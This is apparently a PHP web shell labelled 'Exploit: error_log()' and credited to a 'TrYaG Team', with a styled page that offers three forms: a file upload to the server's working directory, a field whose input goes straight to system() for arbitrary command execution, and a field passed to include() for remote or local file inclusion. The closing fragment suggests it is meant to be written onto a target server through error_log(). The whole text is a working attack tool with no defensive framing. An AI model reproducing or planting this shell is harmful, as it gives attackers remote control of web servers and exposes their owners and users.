<title> Exploit: error_log() By * TrYaG Team * </title>
<body bgcolor="#000000">
<table Width=\'100%\' height=\'10%\' bgcolor=\'#8C0404\' border=\'1\'>
<tr>
<td><center><font size=\'6\' color=\'#BBB516\'> By TrYaG Team</font></center></td>
</tr>
</table>
<font color=\'#FF0000\'>
</head>
<?
if($fileup == ""){
ECHO " reade for up ";
}else{
$path= exec("pwd");
$path .= "/$fileup_name";
$CopyFile = copy($fileup,"$path");
if($CopyFile){
echo " up ok ";
}else{
echo " no up ";
}
}
if(empty($_POST[\'m\'])){
} else {
$m=$_POST[\'m\'];
echo system($m);
}
if(empty($_POST[\'cmd\'])){
} else {
$h= $_POST[\'cmd\'];
print include($h) ;
}
?>
<form method=\'POST\' enctype=\'multipart/form-data\' >
<input type=\'file\' name=\'fileup\' size=\'20\'>
<input type=\'submit\' value=\' up \'>
</form>
<form method=\'POST\' >
<input type=\'cmd\' name=\'cmd\' size=\'20\'>
<input type=\'submit\' value=\' open (shill.txt) \'>
</form>
<form method=\'POST\' enctype=\'multipart/form-data\' >
<input type=\'text\' name=\'m\' size=\'20\'>
<input type=\'submit\' value=\' run \'>
<input type=\'reset\' value=\' reset \'>
</form>
", 3,$ERORR);
}